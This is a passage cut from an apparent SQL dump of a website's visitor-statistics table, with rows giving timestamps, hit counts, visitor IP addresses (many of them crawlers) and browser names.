3,0,0,'46.229.168.69','other'),(151118,1504176399,5,5,0,0,'46.229.168.76','other'),(151119,1504176447,5,5,0,0,'91.121.86.136','other'),(151120,1504176452,6,6,0,0,'46.229.168.71','other'),(151121,1504176501,6,6,0,0,'46.229.168.77','other'),(151122,1504176853,4,4,0,0,'46.229.168.74','other'),(151123,1504176886,5,5,0,0,'46.229.168.66','other'),(151124,1504176903,7,7,0,0,'46.229.168.79','other'),(151125,1504176921,2,2,0,0,'46.229.168.67','other'),(151126,1504176975,6,6,0,0,'46.229.168.75','other'),(151127,1504177012,1,1,0,0,'46.229.168.73','other'),(151128,1504177053,4,4,0,0,'46.229.168.78','other'),(151129,1504177183,2,2,0,0,'46.229.168.70','other'),(151130,1504177290,1,1,0,0,'37.73.236.67','other'),(151131,1504177291,3,3,0,0,'46.229.168.68','other'),(151132,1504177365,1,1,0,0,'46.229.168.72','other'),(151133,1504177472,2,2,0,0,'91.209.11.236','other'),(151134,1504177550,2,2,0,0,'46.229.168.77','other'),(151135,1504177584,1,1,0,0,'46.229.168.69','other'),(151136,1504177674,1,1,0,0,'46.229.168.71','other'),(151137,1504177694,1,1,0,0,'8.29.198.25','other'),(151138,1504177753,1,1,0,0,'217.182.132.58','other'),(151139,1504178212,2,2,0,0,'141.8.183.1','other'),(151140,1504178317,1,1,0,0,'141.8.142.107','other'),(151141,1504178558,1,1,0,0,'91.196.178.70','chrome'),(151142,1504179341,1,1,0,0,'141.8.142.107','other'),(151143,1504179401,1,1,0,0,'91.209.11.236','other'),(151144,1504180137,1,1,0,0,'51.255.65.10','other'),(151145,1504180171,1,1,0,0,'5.45.207.64','other'),(151146,1504180472,1,1,0,0,'176.102.195.10','chrome'),(151147,1504180522,1,1,0,0,'141.8.142.21','other'),(151148,1504180551,1,1,0,0,'91.196.178.66','firefox'),(151149,1504180966,1,1,0,0,'141.8.183.5','other'),(151150,1504181002,1,1,0,0,'164.132.164.180','other'),(151151,1504181122,1,1,0,0,'217.182.132.152','other'),(151152,1504181348,1,1,0,0,'217.182.132.6','other'),(151153,1504181585,1,1,0,0,'51.255.65.36','other'),(151154,1504181671,2,2,0,0,'5.9.155.37','other'),(151155,1504181979,1,1,0,0,'217.69.133.2','other'),(151156,1504182175,1,1,0,0,'207.46.13.112','other'),(151157,1504182397,1,1,0,0,'51.255.65.19','other'),(151158,1504182542,1,1,0,0,'51.255.71.129','other'),(151159,1504182906,1,1,0,0,'80.77.37.26','firefox'),(151160,1504183140,1,1,0,0,'217.182.132.172','other'),(151161,1504183738,1,1,0,0,'51.255.65.60','other'),(151162,1504184367,2,2,0,0,'141.8.183.5','other'),(151163,1504184569,1,1,0,0,'213.111.240.135','firefox'),(151164,1504185133,1,1,0,0,'91.209.11.236','other'),(151165,1504185209,1,1,0,0,'51.255.65.38','other'),(151166,1504185219,1,1,0,0,'217.69.133.3','other'),(151167,1504185511,1,1,0,0,'178.92.149.139','chrome'),(151168,1504186099,1,1,0,0,'151.80.27.116','other'),(151169,1504186122,1,1,0,0,'91.196.178.68','firefox'),(151170,1504186693,5,5,0,0,'51.255.173.1','other'),(151171,1504186719,1,1,0,0,'141.8.183.5','other'),(151172,1504186893,1,1,0,0,'199.58.86.211','other'),(151173,1504186930,2,2,0,0,'91.209.11.236','other'),(151174,1504187177,1,1,0,0,'217.182.132.7','other'),(151175,1504187186,1,1,0,0,'217.182.132.33','other'),(151176,1504187666,1,1,0,0,'217.182.132.35','other'),(151177,1504188360,2,2,0,0,'91.209.11.236','other'),(151178,1504188534,1,1,0,0,'8.29.198.25','other'),(151179,1504188853,1,1,0,0,'91.124.239.155','chrome'),(151180,1504189056,1,1,0,0,'5.45.207.32','other'),(151181,1504189304,1,1,0,0,'217.182.132.96','other'),(151182,1504189618,1,1,0,0,'213.180.203.32','other'),(151183,1504189644,1,1,0,0,'51.255.65.60','other'),(151184,1504190107,1,1,0,0,'109.63.251.227','msie'),(151185,1504190782,1,1,0,0,'141.8.142.21','other'),(151186,1504190939,2,2,0,0,'91.209.11.236','other'),(151187,1504191316,1,1,0,0,'91.196.178.164','chrome'),(151188,1504191324,1,1,0,0,'5.45.207.64','other'),(151189,1504192796,2,2,0,0,'95.108.181.69','other'),(151190,1504193540,1,1,0,0,'207.46.13.112','other'),(151191,1504193831,1,1,0,0,'217.182.132.173','other'),(151192,1504194105,1,1,0,0,'51.255.65.61','other'),(151193,1504194282,1,1,0,0,'51.255.65.67','other'),(151194,1504195307,1,1,0,0,'51.255.71.115','other'),(151195,1504196256,1,1,0,0,'217.182.132.83','other'),(151196,1504196257,1,1,0,0,'217.182.132.180','other'),(151197,1504196289,1,1,0,0,'178.154.200.7','other'),(151198,1504196862,1,1,0,0,'141.8.142.45','other'),(151199,1504197180,1,1,0,0,'217.182.132.19','other'),(151200,1504197597,1,1,0,0,'178.154.200.7','other'),(151201,1504198697,1,1,0,0,'51.255.65.12','other'),(151202,1504198910,1,0,1,0,'66.249.76.93',''),(151203,1504199328,1,1,0,0,'217.69.133.203','other'),(151204,1504199371,1,1,0,0,'8.29.198.26','other'),(151205,1504199633,1,1,0,0,'137.74.207.159','other'),(151206,1504200113,1,1,0,0,'217.182.132.240','other'),(151207,1504200275,1,1,0,0,'137.74.207.114','other'),(151208,1504200693,1,1,0,0,'95.108.181.63','other'),(151209,1504201145,1,1,0,0,'141.8.142.107','other'),(151210,1504201281,1,1,0,0,'91.196.178.66','firefox'),(151211,1504201505,1,1,0,0,'51.255.65.71','other'),(151212,1504202410,1,1,0,0,'83.143.240.13','chrome'),(151213,1504202435,1,1,0,0,'178.154.200.7','other'),(151214,1504202643,1,1,0,0,'5.45.207.64','other'),(151215,1504202679,1,1,0,0,'51.255.65.23','other'),(151216,1504202763,1,1,0,0,'141.8.183.1','other'),(151217,1504203934,1,1,0,0,'37.54.23.3','chrome'),(151218,1504204251,1,1,0,0,'213.180.203.32','other'),(151219,1504204418,2,2,0,0,'95.108.181.69','other'),(151220,1504204423,1,1,0,0,'37.9.113.180','other'),(151221,1504204704,1,1,0,0,'178.154.200.7','other'),(151222,1504204760,11,11,0,0,'52.213.170.87','other'),(151223,1504204797,1,1,0,0,'5.9.138.93','firefox'),(151224,1504204907,1,1,0,0,'217.69.133.6','other'),(151225,1504205377,1,1,0,0,'37.9.113.94','other'),(151226,1504205447,1,1,0,0,'51.255.65.56','other'),(151227,1504205935,1,1,0,0,'217.182.132.177','other'),(151228,1504207060,1,1,0,0,'217.182.132.183','other'),(151229,1504207487,1,1,0,0,'51.255.65.38','other'),(151230,1504207589,1,1,0,0,'217.182.132.24','other'),(151231,1504209084,1,1,0,0,'5.45.207.64','other'),(151232,1504209320,1,1,0,0,'5.45.207.32','other'),(151233,1504209737,1,1,0,0,'81.1.242.33','other'),(151234,1504210211,1,1,0,0,'8.29.198.26','other'),(151235,1504210301,1,1,0,0,'46.161.9.39','other'),(151236,1504210774,1,1,0,0,'5.45.207.64','other'),(151237,1504210946,1,0,1,0,'66.249.66.74',''),(151238,1504211036,1,1,0,0,'141.8.142.107','other'),(151239,1504212012,1,1,0,0,'51.255.65.3','other'),(151240,1504212821,1,1,0,0,'91.209.11.236','other'),(151241,1504213208,1,1,0,0,'217.182.132.191','other'),(151242,1504214086,1,1,0,0,'40.77.167.86','other'),(151243,1504214919,1,1,0,0,'95.24.21.43','msie'),(151244,1504215344,1,1,0,0,'128.72.10.64','msie'),(151245,1504215529,1,1,0,0,'128.72.208.243','msie'),(151246,1504215983,1,1,0,0,'217.182.132.155','other'),(151247,1504216461,1,1,0,0,'137.74.207.108','other'),(151248,1504216519,1,1,0,0,'51.255.65.10','other'),(151249,1504216662,1,1,0,0,'5.228.207.223','msie'),(151250,1504216829,1,1,0,0,'109.63.241.125','msie'),(151251,1504216850,1,1,0,0,'95.108.181.63','other'),(151252,1504217168,1,1,0,0,'91.209.11.236','other'),(151253,1504218149,1,1,0,0,'51.255.65.25','other'),(151254,1504218695,1,1,0,0,'183.48.21.255','other'),(151255,1504218731,1,1,0,0,'207.46.13.112','other'),(151256,1504218949,2,2,0,0,'91.209.11.236','other'),(151257,1504218991,1,1,0,0,'180.76.15.156','other'),(151258,1504219064,1,1,0,0,'141.8.183.1','other'),(151259,1504219659,1,1,0,0,'217.182.132.76','other'),(151260,1504219945,1,1,0,0,'95.108.181.63','other'),(151261,1504220404,1,1,0,0,'51.255.71.117','other'),(151262,1504220547,1,1,0,0,'91.209.11.236','other'),(151263,1504220618,1,1,0,0,'213.180.203.32','other'),(151264,1504220652,1,1,0,0,'217.182.132.54','other'),(151265,1504220887,1,1,0,0,'217.182.132.61','other'),(151266,1504221044,1,1,0,0,'8.29.198.26','other'),(151267,1504221494,1,1,0,0,'51.255.65.82','other'),(151268,1504221597,1,1,0,0,'217.182.132.60','other'),(151269,1504222425,1,1,0,0,'217.182.132.14','other'),(151270,1504222434,1,1,0,0,'95.108.181.63','other'),(151271,1504222750,1,1,0,0,'51.255.65.46','other'),(151272,1504222883,1,0,1,0,'66.249.66.76',''),(151273,1504223200,1,0,1,0,'66.249.66.75',''),(151274,1504223261,1,1,0,0,'217.182.132.59','other'),(151275,1504223421,1,1,0,0,'51.255.65.14','other'),(151276,1504223693,1,1,0,0,'128.72.10.64','msie'),(151277,1504223923,2,2,0,0,'141.8.142.107','other'),(151278,1504224435,1,1,0,0,'128.72.208.243','msie'),(151279,1504224989,1,1,0,0,'141.8.183.5','other'),(151280,1504225284,1,0,1,0,'66.249.76.91',''),(151281,1504225380,1,1,0,0,'95.108.181.69','other'),(151282,1504225419,1,0,1,0,'66.249.76.109',''),(151283,1504225757,1,1,0,0,'5.228.207.223','msie'),(151284,1504225952,1,1,0,0,'91.209.11.236','other'),(151285,1504226010,1,1,0,0,'109.63.241.125','msie'),(151286,1504226287,1,1,0,0,'95.108.181.69','other'),(151287,1504226389,1,1,0,0,'141.8.142.45','other'),(151288,1504227495,1,1,0,0,'95.24.21.43','msie'),(151289,1504228633,1,1,0,0,'207.46.13.112','other'),(151290,1504229002,1,1,0,0,'91.209.11.236','other'),(151291,1504230868,1,1,0,0,'91.209.11.236','other'),(151292,1504231316,1,0,1,0,'66.249.76.108',''),(151293,1504231552,1,1,0,0,'52.211.96.228','other'),(151294,1504231680,1,1,0,0,'52.211.129.77','other'),(151295,1504231875,1,1,0,0,'8.29.198.27','other'),(151296,1504232465,1,1,0,0,'91.209.11.236','other'),(151297,1504232742,1,1,0,0,'5.45.207.32','other'),(151298,1504232978,1,1,0,0,'51.255.65.63','other'),(151299,1504233223,1,1,0,0,'217.69.133.9','other'),(151300,1504233357,1,1,0,0,'128.72.208.243','msie'),(151301,1504233433,1,1,0,0,'5.45.207.64','other'),(151302,1504233765,1,1,0,0,'94.228.207.155','chrome'),(151303,1504234024,1,1,0,0,'51.255.71.119','other'),(151304,1504234205,1,1,0,0,'217.182.132.64','other'),(151305,1504234480,1,1,0,0,'5.228.207.223','msie'),(151306,1504234481,1,1,0,0,'34.252.106.179','other'),(151307,1504234484,1,1,0,0,'141.8.142.21','other'),(151308,1504234506,1,1,0,0,'109.63.241.125','msie'),(151309,1504234558,1,1,0,0,'34.253.136.151','other'),(151310,1504234563,1,1,0,0,'5.45.207.32','other'),(151311,1504234600,1,1,0,0,'37.229.204.176','firefox'),(151312,1504234949,2,2,0,0,'141.8.183.5','other'),(151313,1504234995,1,1,0,0,'141.8.183.1','other'),(151314,1504235334,1,1,0,0,'51.255.71.120','other'),(151315,1504235373,1,1,0,0,'40.77.167.136','other'),(151316,1504235384,1,1,0,0,'95.108.181.69','other'),(151317,1504235508,1,1,0,0,'217.182.132.14','other'),(151318,1504235596,1,1,0,0,'91.209.11.236','other'),(151319,1504235812,1,0,1,0,'66.249.76.91',''),(151320,1504236045,1,1,0,0,'137.74.207.159','other'),(151321,1504236316,2,2,0,0,'141.8.142.21','other'),(151322,1504236459,1,1,0,0,'51.255.65.31','other'),(151323,1504236660,1,1,0,0,'137.74.207.120','other'),(151324,1504236814,1,1,0,0,'91.209.11.236','other'),(151325,1504236915,1,1,0,0,'37.229.204.176','firefox'),(151326,1504237746,1,1,0,0,'95.108.181.63','other'),(151327,1504238224,1,1,0,0,'37.9.113.163','other'),(151328,1504238507,1,1,0,0,'217.182.132.54','other'),(151329,1504238626,1,1,0,0,'217.182.132.155','other'),(151330,1504238802,1,1,0,0,'164.132.162.158','other'),(151331,1504239743,1,1,0,0,'51.255.65.5','other'),(151332,1504239977,1,1,0,0,'51.255.71.111','other'),(151333,1504240044,1,1,0,0,'95.24.21.43','msie'),(151334,1504240187,1,1,0,0,'51.255.71.120','other'),(151335,1504240416,1,1,0,0,'92.113.188.54','chrome'),(151336,1504240499,1,1,0,0,'51.255.65.70','other'),(151337,1504240513,1,1,0,0,'217.182.132.179','other'),(151338,1504240684,1,1,0,0,'141.8.142.45','other'),(151339,1504241035,1,1,0,0,'51.255.65.76','other'),(151340,1504241379,1,1,0,0,'217.182.132.77','other'),(151341,1504241407,1,1,0,0,'217.182.132.69','other'),(151342,1504241913,1,1,0,0,'91.196.178.72','firefox'),(151343,1504241984,1,1,0,0,'131.253.27.156','other'),(151344,1504242436,1,1,0,0,'128.72.208.243','msie'),(151345,1504242606,1,1,0,0,'91.196.178.66','firefox'),(151346,1504242713,1,1,0,0,'8.29.198.27','other'),(151347,1504243428,1,1,0,0,'217.182.132.151','other'),(151348,1504243855,1,1,0,0,'109.63.241.125','msie'),(151349,1504244389,1,1,0,0,'5.228.207.223','msie'),(151350,1504244827,1,1,0,0,'51.255.65.56','other'),(151351,1504245570,1,1,0,0,'91.209.11.236','other'),(151352,1504246186,1,1,0,0,'95.108.181.63','other'),(151353,1504246907,2,2,0,0,'141.8.183.5','other'),(151354,1504247531,1,1,0,0,'91.209.11.236','other'),(151355,1504247810,1,1,0,0,'137.74.207.159','other'),(151356,1504248108,1,1,0,0,'91.196.178.130','chrome'),(151357,1504248189,1,1,0,0,'51.255.65.2','other'),(151358,1504248275,1,1,0,0,'51.255.71.120','other'),(151359,1504248475,1,1,0,0,'217.182.132.240','other'),(151360,1504248648,1,1,0,0,'217.182.132.193','other'),(151361,1504249071,2,2,0,0,'91.196.178.66','firefox'),(151362,1504249367,2,2,0,0,'91.196.178.133','firefox'),(151363,1504249796,1,1,0,0,'178.154.200.7','other'),(151364,1504250087,1,1,0,0,'51.255.65.38','other'),(151365,1504250136,1,1,0,0,'199.16.157.181','other'),(151366,1504250965,1,1,0,0,'5.45.207.64','other'),(151367,1504250968,1,1,0,0,'141.8.183.1','other'),(151368,1504251127,1,1,0,0,'217.182.132.6','other'),(151369,1504251855,1,1,0,0,'51.255.65.42','other'),(151370,1504252012,1,1,0,0,'207.46.13.112','other'),(151371,1504252075,2,2,0,0,'91.196.178.70','chrome'),(151372,1504252389,1,1,0,0,'78.111.190.156','chrome'),(151373,1504252552,1,1,0,0,'51.255.65.55','other'),(151374,1504252862,1,1,0,0,'5.255.253.2','other'),(151375,1504253006,1,1,0,0,'217.182.132.154','other'),(151376,1504253223,1,1,0,0,'51.255.65.63','other'),(151377,1504253242,1,1,0,0,'37.52.31.241','chrome'),(151378,1504253557,1,1,0,0,'8.29.198.26','other'),(151379,1504253694,1,1,0,0,'207.46.13.112','other'),(151380,1504254109,1,1,0,0,'141.8.142.21','other'),(151381,1504254398,1,1,0,0,'51.255.65.25','other'),(151382,1504254496,1,1,0,0,'217.182.132.171','other'),(151383,1504254791,1,1,0,0,'51.255.65.88','other'),(151384,1504255027,1,1,0,0,'217.182.132.25','other'),(151385,1504255338,1,0,1,0,'66.249.76.107',''),(151386,1504255340,1,1,0,0,'178.154.200.7','other'),(151387,1504255526,7,7,0,0,'91.121.86.136','other'),(151388,1504255637,1,1,0,0,'51.255.65.224','other'),(151389,1504256406,1,1,0,0,'51.255.65.8','other'),(151390,1504256630,1,1,0,0,'37.54.23.3','chrome'),(151391,1504257520,1,1,0,0,'164.132.162.153','other'),(151392,1504257674,1,1,0,0,'217.182.132.82','other'),(151393,1504257852,1,1,0,0,'91.196.178.66','firefox'),(151394,1504257920,1,0,1,0,'66.249.76.109',''),(151395,1504258151,1,1,0,0,'217.182.132.146','other'),(151396,1504258560,1,1,0,0,'217.182.132.241','other'),(151397,1504259105,1,1,0,0,'91.196.177.15','chrome'),(151398,1504259881,1,1,0,0,'185.76.10.66','chrome'),(151399,1504260014,1,1,0,0,'137.74.207.170','other'),(151400,1504260465,1,1,0,0,'40.77.167.86','other'),(151401,1504260545,1,1,0,0,'51.255.65.87','other'),(151402,1504260626,1,1,0,0,'66.102.9.57','chrome'),(151403,1504260687,1,1,0,0,'207.46.13.112','other'),(151404,1504260811,1,1,0,0,'51.255.65.10','other'),(151405,1504261606,1,1,0,0,'51.255.65.70','other'),(151406,1504262169,1,1,0,0,'217.69.133.4','other'),(151407,1504262173,1,1,0,0,'51.255.65.23','other'),(151408,1504262184,41,41,0,0,'167.114.219.41','other'),(151409,1504262304,1,0,1,0,'66.249.76.91',''),(151410,1504262510,1,1,0,0,'213.180.203.32','other'),(151411,1504262544,1,1,0,0,'95.108.181.63','other'),(151412,1504263116,1,1,0,0,'217.182.132.72','other'),(151413,1504263371,1,1,0,0,'217.182.132.25','other'),(151414,1504263549,1,1,0,0,'207.46.13.112','other'),(151415,1504263977,1,1,0,0,'217.182.132.186','other'),(151416,1504264293,1,1,0,0,'141.8.183.5','other'),(151417,1504264391,1,1,0,0,'185.137.17.71','chrome'),(151418,1504264403,1,1,0,0,'8.29.198.25','other'),(151419,1504264481,1,1,0,0,'207.46.13.112','other'),(151420,1504264562,1,1,0,0,'51.255.65.21','other'),(151421,1504265205,1,1,0,0,'91.196.178.65','firefox'),(151422,1504265562,1,1,0,0,'217.182.132.35','other'),(151423,1504265723,1,1,0,0,'194.44.241.86','chrome'),(151424,1504265815,1,1,0,0,'217.182.132.193','other'),(151425,1504266079,1,1,0,0,'51.255.65.56','other'),(151426,1504266124,1,1,0,0,'217.182.132.18','other'),(151427,1504266939,1,1,0,0,'91.196.178.164','chrome'),(151428,1504267129,1,1,0,0,'217.182.132.193','other'),(151429,1504267144,1,1,0,0,'217.182.132.20','other'),(151430,1504267398,1,1,0,0,'91.196.178.66','firefox'),(151431,1504267480,1,0,1,0,'66.249.66.76',''),(151432,1504267672,1,1,0,0,'51.255.71.114','other'),(151433,1504267692,1,1,0,0,'217.182.132.87','other'),(151434,1504267746,1,1,0,0,'51.255.65.97','other'),(151435,1504267861,1,1,0,0,'51.255.65.30','other'),(151436,1504268217,1,1,0,0,'141.8.183.1','other'),(151437,1504269751,1,1,0,0,'66.249.76.109','chrome'),(151438,1504270120,1,1,0,0,'51.255.65.224','other'),(151439,1504270310,1,1,0,0,'217.182.132.25','other'),(151440,1504271187,1,1,0,0,'91.196.177.46','firefox'),(151441,1504271242,1,1,0,0,'51.255.71.132','other'),(151442,1504271883,1,1,0,0,'207.46.13.112','other'),(151443,1504272184,1,1,0,0,'66.249.66.157','chrome'),(151444,1504272404,1,1,0,0,'178.94.172.29','chrome'),(151445,1504272625,1,1,0,0,'40.77.167.136','other'),(151446,1504272986,1,1,0,0,'51.255.65.4','other'),(151447,1504273144,1,0,1,0,'66.249.76.89',''),(151448,1504273442,1,1,0,0,'141.8.183.1','other'),(151449,1504273692,1,1,0,0,'37.54.23.3','chrome'),(151450,1504273772,1,1,0,0,'217.182.132.186','other'),(151451,1504274385,1,1,0,0,'164.132.162.154','other'),(151452,1504274412,1,1,0,0,'109.173.110.70','msie'),(151453,1504274637,1,1,0,0,'137.74.207.119','other'),(151454,1504274658,1,1,0,0,'217.182.132.66','other'),(151455,1504274808,1,1,0,0,'51.255.65.70','other'),(151456,1504275245,1,1,0,0,'8.29.198.25','other'),(151457,1504275431,1,1,0,0,'95.108.181.63','other'),(151458,1504275623,1,1,0,0,'91.196.177.15','chrome'),(151459,1504275725,1,1,0,0,'207.46.13.112','other'),(151460,1504275933,1,1,0,0,'51.255.65.57','other'),(151461,1504275956,1,1,0,0,'51.255.71.127','other'),(151462,1504276750,1,1,0,0,'141.8.183.1','other'),(151463,1504277631,1,1,0,0,'94.179.208.84','chrome'),(151464,1504278027,1,1,0,0,'213.180.203.32','other'),(151465,1504278346,1,1,0,0,'40.77.167.86','other'),(151466,1504278573,1,1,0,0,'51.255.71.126','other'),(151468,1504278599,1,1,0,0,'51.255.65.17','other'),(151469,1504278717,1,1,0,0,'217.182.132.65','other'),(151470,1504278794,1,1,0,0,'217.182.132.55','other'),(151471,1504279117,1,1,0,0,'91.196.178.69','firefox'),(151472,1504279278,1,1,0,0,'51.255.71.112','other'),(151473,1504279419,2,2,0,0,'213.180.203.32','other'),(151474,1504279458,1,1,0,0,'141.8.183.5','other'),(151475,1504279536,1,1,0,0,'91.196.178.163','chrome'),(151476,1504279556,1,1,0,0,'40.77.167.136','other'),(151477,1504280882,1,1,0,0,'137.74.207.161','other'),(151478,1504281025,1,1,0,0,'51.255.65.17','other'),(151479,1504281035,2,2,0,0,'51.255.65.43','other'),(151480,1504281494,1,1,0,0,'51.255.71.126','other'),(151481,1504281988,1,1,0,0,'141.8.183.5','other'),(151482,1504282040,1,0,1,0,'66.249.66.74',''),(151483,1504282085,1,1,0,0,'91.196.178.163','chrome'),(151484,1504282480,1,1,0,0,'164.132.162.155','other'),(151485,1504282527,1,1,0,0,'217.182.132.72','other'),(151486,1504282655,1,1,0,0,'213.180.203.32','other'),(151487,1504282682,1,1,0,0,'141.8.142.45','other'),(151488,1504282738,2,2,0,0,'141.8.183.1','other'),(151489,1504282742,1,0,1,0,'66.249.76.109',''),(151490,1504282922,1,1,0,0,'188.166.79.230','chrome'),(151491,1504283231,1,1,0,0,'217.182.132.172','other'),(151492,1504283555,1,1,0,0,'5.45.207.32','other'),(151493,1504283793,1,1,0,0,'141.8.183.5','other'),(151494,1504284168,1,1,0,0,'141.8.183.1','other'),(151495,1504284235,1,1,0,0,'51.255.65.50','other'),(151496,1504284473,1,1,0,0,'37.54.23.3','chrome'),(151497,1504285233,1,1,0,0,'108.59.8.70','other'),(151498,1504286023,1,1,0,0,'95.108.181.63','other'),(151499,1504286085,1,1,0,0,'8.29.198.25','other'),(151500,1504286137,1,1,0,0,'95.108.181.69','other'),(151501,1504286212,1,1,0,0,'40.77.167.86','other'),(151502,1504286282,1,1,0,0,'141.8.183.5','other'),(151503,1504286468,1,1,0,0,'51.255.65.46','other'),(151504,1504286540,1,1,0,0,'176.31.231.10','other'),(151505,1504286652,1,1,0,0,'188.163.16.6','chrome'),(151506,1504286704,1,1,0,0,'51.255.65.2','other'),(151507,1504286855,1,1,0,0,'66.249.76.109','chrome'),(151508,1504286857,1,1,0,0,'66.249.76.107','chrome'),(151509,1504287385,1,1,0,0,'51.255.65.39','other'),(151510,1504287728,1,1,0,0,'51.255.65.51','other'),(151511,1504287848,1,1,0,0,'51.255.65.93','other'),(151512,1504288268,1,1,0,0,'66.249.69.199','chrome'),(151513,1504288539,1,1,0,0,'40.77.167.86','other'),(151514,1504288594,1,1,0,0,'37.73.200.211','chrome'),(151515,1504288694,1,1,0,0,'51.255.65.25','other'),(151516,1504289007,1,1,0,0,'180.76.15.12','other'),(151517,1504289495,1,1,0,0,'180.76.15.155','other'),(151518,1504290019,1,1,0,0,'141.8.142.21','other'),(151519,1504290444,1,0,1,0,'66.249.76.89',''),(151520,1504291085,1,1,0,0,'66.249.76.109','chrome'),(151521,1504291203,1,1,0,0,'217.182.132.191','other'),(151522,1504291405,1,1,0,0,'217.182.132.171','other'),(151523,1504291469,1,1,0,0,'213.180.203.32','other'),(151524,1504291496,1,1,0,0,'93.171.7.121','msie'),(151525,1504291520,1,1,0,0,'45.33.96.225','msie'),(151526,1504291761,1,1,0,0,'91.196.178.164','chrome'),(151527,1504291870,1,1,0,0,'5.45.207.32','other'),(151528,1504292393,1,1,0,0,'207.46.13.112','other'),(151529,1504292782,1,1,0,0,'51.255.71.132','other'),(151530,1504293685,1,1,0,0,'66.249.75.157','chrome'),(151531,1504293985,1,1,0,0,'217.182.132.176','other'),(151532,1504294362,1,0,1,0,'66.249.76.109',''),(151533,1504294764,1,0,1,0,'66.249.76.89',''),(151534,1504295145,1,1,0,0,'5.45.207.32','other'),(151535,1504295290,1,1,0,0,'141.8.183.5','other'),(151536,1504295362,1,1,0,0,'95.108.181.63','other'),(151537,1504295825,1,1,0,0,'37.9.113.94','other'),(151538,1504296199,1,1,0,0,'37.9.113.195','other'),(151539,1504296339,1,1,0,0,'141.8.183.5','other'),(151540,1504296342,1,1,0,0,'207.46.13.112','other'),(151541,1504296632,1,1,0,0,'51.255.65.33','other'),(151542,1504296865,1,1,0,0,'95.108.181.63','other'),(151543,1504296871,1,1,0,0,'217.182.132.16','other'),(151544,1504296931,1,1,0,0,'8.29.198.26','other'),(151545,1504296992,2,2,0,0,'5.45.207.64','other'),(151546,1504297446,1,1,0,0,'66.249.69.195','chrome'),(151547,1504297545,1,1,0,0,'51.255.65.58','other'),(151548,1504297976,1,1,0,0,'137.74.207.170','other'),(151549,1504297979,1,1,0,0,'51.255.71.126','other'),(151550,1504298054,1,1,0,0,'141.8.183.1','other'),(151551,1504298204,1,1,0,0,'5.255.253.2','other'),(151552,1504298207,1,1,0,0,'37.9.113.138','other'),(151553,1504298352,1,1,0,0,'51.255.65.224','other'),(151554,1504299035,1,1,0,0,'51.255.65.23','other'),(151555,1504299078,1,1,0,0,'164.132.162.160','other'),(151556,1504299215,1,1,0,0,'5.45.207.64','other'),(151557,1504299476,1,0,1,0,'66.249.76.107',''),(151558,1504299977,1,1,0,0,'217.182.132.154','other'),(151559,1504301136,2,2,0,0,'91.209.11.236','other'),(151560,1504301595,1,1,0,0,'66.249.75.155','chrome'),(151561,1504301768,1,0,1,0,'66.249.75.157',''),(151562,1504301973,1,1,0,0,'51.255.65.50','other'),(151563,1504302064,1,1,0,0,'51.255.71.100','other'),(151564,1504302338,1,1,0,0,'137.74.207.116','other'),(151565,1504302360,1,1,0,0,'91.196.178.97','other'),(151566,1504302674,1,1,0,0,'51.255.65.41','other'),(151567,1504303598,1,1,0,0,'51.255.65.94','other'),(151568,1504303878,1,1,0,0,'213.180.203.32','other'),(151569,1504304855,2,2,0,0,'141.8.183.1','other'),(151570,1504304988,1,1,0,0,'5.45.207.64','other'),(151571,1504305069,1,1,0,0,'51.255.71.115','other'),(151572,1504305831,1,1,0,0,'213.180.203.32','other'),(151573,1504306672,1,1,0,0,'51.255.65.14','other'),(151574,1504307525,1,1,0,0,'217.182.132.172','other'),(151575,1504307767,1,1,0,0,'8.29.198.25','other'),(151576,1504307801,1,1,0,0,'217.182.132.180','other'),(151577,1504307814,1,1,0,0,'185.156.173.41','chrome'),(151578,1504308090,1,1,0,0,'51.255.65.58','other'),(151579,1504308542,1,1,0,0,'217.182.132.80','other'),(151580,1504308743,1,1,0,0,'217.182.132.73','other'),(151581,1504309162,1,1,0,0,'217.182.132.152','other'),(151582,1504309340,1,1,0,0,'176.31.231.10','other'),(151583,1504309465,1,1,0,0,'51.255.65.39','other'),(151584,1504310070,1,1,0,0,'137.74.207.114','other'),(151585,1504310431,1,0,1,0,'66.249.76.109',''),(151586,1504310696,1,1,0,0,'217.182.132.240','other'),(151587,1504311281,1,1,0,0,'66.249.76.109','chrome'),(151588,1504311701,1,1,0,0,'51.255.71.100','other'),(151589,1504311931,1,1,0,0,'178.154.200.7','other'),(151590,1504311997,1,1,0,0,'51.255.65.36','other'),(151591,1504312526,1,1,0,0,'95.108.181.63','other'),(151592,1504312644,1,1,0,0,'217.182.132.19','other'),(151593,1504313267,1,1,0,0,'5.45.207.64','other'),(151594,1504313493,1,1,0,0,'217.182.132.74','other'),(151595,1504313631,1,0,1,0,'66.249.76.108',''),(151596,1504313782,1,0,1,0,'66.249.75.153',''),(151597,1504314353,1,0,1,0,'66.249.69.195',''),(151598,1504314839,1,1,0,0,'180.76.15.6','other'),(151599,1504315048,1,1,0,0,'178.154.200.7','other'),(151600,1504315324,1,1,0,0,'51.255.65.77','other'),(151601,1504316970,1,1,0,0,'5.45.207.64','other'),(151602,1504317191,1,1,0,0,'46.246.25.85','chrome'),(151603,1504317371,1,1,0,0,'217.182.132.76','other'),(151604,1504317608,1,1,0,0,'207.46.13.112','other'),(151605,1504317861,1,1,0,0,'217.182.132.94','other'),(151606,1504318600,1,1,0,0,'8.29.198.25','other'),(151607,1504318769,1,1,0,0,'51.255.65.78','other'),(151608,1504319793,1,1,0,0,'217.182.132.74','other'),(151609,1504319945,1,1,0,0,'51.255.65.85','other'),(151610,1504319971,1,0,1,0,'66.249.76.107',''),(151611,1504320066,1,1,0,0,'217.182.132.68','other'),(151612,1504320638,1,1,0,0,'91.209.11.236','other'),(151613,1504321196,1,1,0,0,'51.255.65.92','other'),(151614,1504321400,1,1,0,0,'51.255.65.73','other'),(151615,1504321955,1,1,0,0,'164.132.164.180','other'),(151616,1504322214,1,1,0,0,'91.209.11.236','other'),(151617,1504322879,1,1,0,0,'213.180.203.32','other'),(151618,1504322920,1,1,0,0,'217.182.132.190','other'),(151619,1504323140,1,1,0,0,'217.69.133.224','other'),(151620,1504323973,1,1,0,0,'5.45.207.32','other'),(151621,1504324018,1,1,0,0,'66.249.69.195','chrome'),(151622,1504324200,1,1,0,0,'217.182.132.183','other'),(151623,1504324214,1,1,0,0,'91.209.11.236','other'),(151624,1504324310,1,1,0,0,'141.8.183.5','other'),(151625,1504324772,1,1,0,0,'180.76.15.34','other'),(151626,1504324881,1,1,0,0,'51.255.65.71','other'),(151627,1504324899,1,1,0,0,'5.45.207.64','other'),(151628,1504325301,1,1,0,0,'51.255.65.69','other'),(151629,1504325326,1,1,0,0,'137.74.203.194','other'),(151630,1504325475,1,1,0,0,'157.55.13.64','other'),(151631,1504325599,1,1,0,0